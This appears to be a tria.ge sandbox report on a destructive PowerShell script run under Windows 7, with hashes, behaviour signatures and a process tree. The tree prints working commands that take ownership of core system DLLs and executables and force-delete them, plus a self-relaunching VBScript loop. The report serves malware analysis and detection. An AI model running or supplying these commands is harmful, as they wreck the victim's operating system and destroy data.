Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    122s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags

    arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
  • submitted
    15/07/2024, 15:38

General

  • Target

    script.ps1

  • Size

    2KB

  • MD5

    3254b5618f8278514f8e83dedb5c7996

  • SHA1

    19b12a1ec5e94fca3c1f07b357e74fe791f001bc

  • SHA256

    cd80c4f9e20f6f7f2d0694ed8a21aeeedd1bb075ee6794d39fbd0b2f8f85c2f3

  • SHA512

    9e52971f389e7f0bb5663825d51a938af46fbc48ec49307c314a435ba646d458f9c5748d79099dd289efcb6ce7311bbe301f92820754f3cff11639733629d897

Malware Config

Signatures

  • Possible privilege escalation attempt 28 IoCs
  • Modifies file permissions 1 TTPs 28 IoCs
  • Drops file in Windows directory 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Kills process with taskkill 3 IoCs
  • Runs regedit.exe 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 18 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\script.ps1
    1⤵
    • Command and Scripting Interpreter: PowerShell
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2532
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c "takeown /f C:\Windows\System32\hal.dll && icacls C:\Windows\System32\hal.dll /grant Everyone:(F) && del/f C:\Windows\System32\hal.dll"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2400
      • C:\Windows\system32\takeown.exe
        takeown /f C:\Windows\System32\hal.dll
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • Suspicious use of AdjustPrivilegeToken
        PID:3044
      • C:\Windows\system32\icacls.exe
        icacls C:\Windows\System32\hal.dll /grant Everyone:(F)
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        PID:3024
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c "takeown /f C:\Windows\System32\user32.dll && icacls C:\Windows\System32\user32.dll /grant Everyone:(F) && del/f C:\Windows\System32\user32.dll"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2688
      • C:\Windows\system32\takeown.exe
        takeown /f C:\Windows\System32\user32.dll
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • Suspicious use of AdjustPrivilegeToken
        PID:2096
      • C:\Windows\system32\icacls.exe
        icacls C:\Windows\System32\user32.dll /grant Everyone:(F)
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        PID:2300
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c "takeown /f C:\Windows\System32\kernel32.dll && icacls C:\Windows\System32\kernel32.dll /grant Everyone:(F) && del/f C:\Windows\System32\kernel32.dll"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2700
      • C:\Windows\system32\takeown.exe
        takeown /f C:\Windows\System32\kernel32.dll
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • Suspicious use of AdjustPrivilegeToken
        PID:2928
      • C:\Windows\system32\icacls.exe
        icacls C:\Windows\System32\kernel32.dll /grant Everyone:(F)
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        PID:2744
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c "takeown /f C:\Windows\System32\gdi32.dll && icacls C:\Windows\System32\gdi32.dll /grant Everyone:(F) && del/f C:\Windows\System32\gdi32.dll"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2808
      • C:\Windows\system32\takeown.exe
        takeown /f C:\Windows\System32\gdi32.dll
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • Suspicious use of AdjustPrivilegeToken
        PID:2812
      • C:\Windows\system32\icacls.exe
        icacls C:\Windows\System32\gdi32.dll /grant Everyone:(F)
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        PID:2848
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c "takeown /f C:\Windows\System32\advapi32.dll && icacls C:\Windows\System32\advapi32.dll /grant Everyone:(F) && del/f C:\Windows\System32\advapi32.dll"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2796
      • C:\Windows\system32\takeown.exe
        takeown /f C:\Windows\System32\advapi32.dll
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • Suspicious use of AdjustPrivilegeToken
        PID:2752
      • C:\Windows\system32\icacls.exe
        icacls C:\Windows\System32\advapi32.dll /grant Everyone:(F)
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        PID:2444
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c "takeown /f C:\Windows\System32\ntdll.dll && icacls C:\Windows\System32\ntdll.dll /grant Everyone:(F) && del/f C:\Windows\System32\ntdll.dll"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2720
      • C:\Windows\system32\takeown.exe
        takeown /f C:\Windows\System32\ntdll.dll
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • Suspicious use of AdjustPrivilegeToken
        PID:2712
      • C:\Windows\system32\icacls.exe
        icacls C:\Windows\System32\ntdll.dll /grant Everyone:(F)
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        PID:2252
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c "takeown /f C:\Windows\System32\shell32.dll && icacls C:\Windows\System32\shell32.dll /grant Everyone:(F) && del/f C:\Windows\System32\shell32.dll"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2820
      • C:\Windows\system32\takeown.exe
        takeown /f C:\Windows\System32\shell32.dll
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • Suspicious use of AdjustPrivilegeToken
        PID:2824
      • C:\Windows\system32\icacls.exe
        icacls C:\Windows\System32\shell32.dll /grant Everyone:(F)
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        PID:2896
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c "takeown /f C:\Windows\System32\ole32.dll && icacls C:\Windows\System32\ole32.dll /grant Everyone:(F) && del/f C:\Windows\System32\ole32.dll"
      2⤵
        PID:2616
        • C:\Windows\system32\takeown.exe
          takeown /f C:\Windows\System32\ole32.dll
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          • Suspicious use of AdjustPrivilegeToken
          PID:2732
        • C:\Windows\system32\icacls.exe
          icacls C:\Windows\System32\ole32.dll /grant Everyone:(F)
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:2760
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "takeown /f C:\Windows\System32\comdlg32.dll && icacls C:\Windows\System32\comdlg32.dll /grant Everyone:(F) && del/f C:\Windows\System32\comdlg32.dll"
        2⤵
          PID:2648
          • C:\Windows\system32\takeown.exe
            takeown /f C:\Windows\System32\comdlg32.dll
            3⤵
            • Possible privilege escalation attempt
            • Modifies file permissions
            • Suspicious use of AdjustPrivilegeToken
            PID:1692
          • C:\Windows\system32\icacls.exe
            icacls C:\Windows\System32\comdlg32.dll /grant Everyone:(F)
            3⤵
            • Possible privilege escalation attempt
            • Modifies file permissions
            PID:2768
        • C:\Windows\system32\cmd.exe
          "C:\Windows\system32\cmd.exe" /c "takeown /f C:\Windows\System32\wininet.dll && icacls C:\Windows\System32\wininet.dll /grant Everyone:(F) && del/f C:\Windows\System32\wininet.dll"
          2⤵
            PID:2588
            • C:\Windows\system32\takeown.exe
              takeown /f C:\Windows\System32\wininet.dll
              3⤵
              • Possible privilege escalation attempt
              • Modifies file permissions
              • Suspicious use of AdjustPrivilegeToken
              PID:2608
            • C:\Windows\system32\icacls.exe
              icacls C:\Windows\System32\wininet.dll /grant Everyone:(F)
              3⤵
              • Possible privilege escalation attempt
              • Modifies file permissions
              PID:2640
          • C:\Windows\system32\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "takeown /f C:\Windows\System32\msvcrt.dll && icacls C:\Windows\System32\msvcrt.dll /grant Everyone:(F) && del/f C:\Windows\System32\msvcrt.dll"
            2⤵
              PID:2672
              • C:\Windows\system32\takeown.exe
                takeown /f C:\Windows\System32\msvcrt.dll
                3⤵
                • Possible privilege escalation attempt
                • Modifies file permissions
                • Suspicious use of AdjustPrivilegeToken
                PID:2764
              • C:\Windows\system32\icacls.exe
                icacls C:\Windows\System32\msvcrt.dll /grant Everyone:(F)
                3⤵
                • Possible privilege escalation attempt
                • Modifies file permissions
                PID:3008
            • C:\Windows\system32\cmd.exe
              "C:\Windows\system32\cmd.exe" /c "takeown /f C:\Windows\regedit.exe && icacls C:\Windows\regedit.exe /grant Everyone:(F) && taskkill /f /im regedit.exe && del/f C:\Windows\regedit.exe"
              2⤵
                PID:2660
                • C:\Windows\system32\takeown.exe
                  takeown /f C:\Windows\regedit.exe
                  3⤵
                  • Possible privilege escalation attempt
                  • Modifies file permissions
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2556
                • C:\Windows\system32\icacls.exe
                  icacls C:\Windows\regedit.exe /grant Everyone:(F)
                  3⤵
                  • Possible privilege escalation attempt
                  • Modifies file permissions
                  PID:3012
                • C:\Windows\system32\taskkill.exe
                  taskkill /f /im regedit.exe
                  3⤵
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1376
              • C:\Windows\system32\cmd.exe
                "C:\Windows\system32\cmd.exe" /c "takeown /f C:\Windows\notepad.exe && icacls C:\Windows\notepad.exe /grant Everyone:(F) && taskkill /f /im notepad.exe && del/f C:\Windows\notepad.exe"
                2⤵
                  PID:1452
                  • C:\Windows\system32\takeown.exe
                    takeown /f C:\Windows\notepad.exe
                    3⤵
                    • Possible privilege escalation attempt
                    • Modifies file permissions
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2072
                  • C:\Windows\system32\icacls.exe
                    icacls C:\Windows\notepad.exe /grant Everyone:(F)
                    3⤵
                    • Possible privilege escalation attempt
                    • Modifies file permissions
                    PID:1232
                  • C:\Windows\system32\taskkill.exe
                    taskkill /f /im notepad.exe
                    3⤵
                    • Kills process with taskkill
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1696
                • C:\Windows\system32\cmd.exe
                  "C:\Windows\system32\cmd.exe" /c "takeown /f C:\Windows\bfsvc.exe && icacls C:\Windows\bfsvc.exe /grant Everyone:(F) && taskkill /f /im bfsvc.exe && del/f C:\Windows\bfsvc.exe"
                  2⤵
                    PID:1676
                    • C:\Windows\system32\takeown.exe
                      takeown /f C:\Windows\bfsvc.exe
                      3⤵
                      • Possible privilege escalation attempt
                      • Modifies file permissions
                      • Suspicious use of AdjustPrivilegeToken
                      PID:748
                    • C:\Windows\system32\icacls.exe
                      icacls C:\Windows\bfsvc.exe /grant Everyone:(F)
                      3⤵
                      • Possible privilege escalation attempt
                      • Modifies file permissions
                      PID:1144
                    • C:\Windows\system32\taskkill.exe
                      taskkill /f /im bfsvc.exe
                      3⤵
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1056
                  • C:\Windows\system32\cmd.exe
                    "C:\Windows\system32\cmd.exe" /c "echo msgbox "YOU ARE GOING TO DIE" >> %windir%\die.vbs"
                    2⤵
                    • Drops file in Windows directory
                    PID:1528
                  • C:\Windows\system32\cmd.exe
                    "C:\Windows\system32\cmd.exe" /c "echo for i = 1 to 100 >> %windir%\loop.vbs"
                    2⤵
                    • Drops file in Windows directory
                    PID:2684
                  • C:\Windows\system32\cmd.exe
                    "C:\Windows\system32\cmd.exe" /c "echo createobject("wscript.shell").run "start %windir%\loop.vbs" >> %windir%\loop.vbs"
                    2⤵
                    • Drops file in Windows directory
                    PID:2248
                  • C:\Windows\system32\cmd.exe
                    "C:\Windows\system32\cmd.exe" /c "echo next >> %windir%\loop.vbs && start %windir%\loop.vbs"
                    2⤵
                    • Drops file in Windows directory
                    PID:464
                    • C:\Windows\System32\WScript.exe
                      "C:\Windows\System32\WScript.exe" "C:\Windows\loop.vbs"
                      3⤵
                        PID:1856
                  • C:\Windows\system32\notepad.exe
                    "C:\Windows\system32\notepad.exe"
                    1⤵
                      PID:324
                    • C:\Windows\regedit.exe
                      "C:\Windows\regedit.exe"
                      1⤵
                      • Runs regedit.exe
                      PID:1496

                    Network

                    MITRE ATT&CK Enterprise v15

                    Replay Monitor

                    Loading Replay Monitor...

                    Downloads

                    • C:\Windows\loop.vbs

                      Filesize

                      83B

                      MD5

                      8ee085ca996a75945a2d4b105113ffa0

                      SHA1

                      3889508589a8499bcf2b22af689cd581836a083b

                      SHA256

                      587701b740dbb0a8a7b8a528e4a2df93f0d94379ec014370c70a391052c0171a

                      SHA512

                      daad5e796dfb206201aa2e8dedb18a3e2d39ab7d002772218c27224f96ba2582a7533a1b97d27ce20cae576e00afa5902358faf0523a71f22220857bc63b373c

                    • C:\Windows\loop.vbs

                      Filesize

                      91B

                      MD5

                      c40d8df9297f480185a50211ab445ea5

                      SHA1

                      83cfe62aa130c3c526aec6e0f87ce3eb95d311e7

                      SHA256

                      eecde88ab73958886e879fedfce2a8ecfa6690d3d28e570403215a2aa4c07513

                      SHA512

                      3af78490bd7775648b64d95ee165503ab6f8cb9175226b7fdc58010f747ae0e542cd18a5939fc2a4ee269e01cef9997b5ff240e9db2e48f40a2c371037397652

                    • memory/2532-4-0x000007FEF571E000-0x000007FEF571F000-memory.dmp

                      Filesize

                      4KB

                    • memory/2532-7-0x000007FEF5460000-0x000007FEF5DFD000-memory.dmp

                      Filesize

                      9.6MB

                    • memory/2532-6-0x0000000001F50000-0x0000000001F58000-memory.dmp

                      Filesize

                      32KB

                    • memory/2532-8-0x000007FEF5460000-0x000007FEF5DFD000-memory.dmp

                      Filesize

                      9.6MB

                    • memory/2532-5-0x000000001B680000-0x000000001B962000-memory.dmp

                      Filesize

                      2.9MB

                    • memory/2532-9-0x000007FEF5460000-0x000007FEF5DFD000-memory.dmp

                      Filesize

                      9.6MB

                    • memory/2532-10-0x000007FEF5460000-0x000007FEF5DFD000-memory.dmp

                      Filesize

                      9.6MB

                    • memory/2532-11-0x000007FEF5460000-0x000007FEF5DFD000-memory.dmp

                      Filesize

                      9.6MB

                    • memory/2532-36-0x000007FEF5460000-0x000007FEF5DFD000-memory.dmp

                      Filesize

                      9.6MB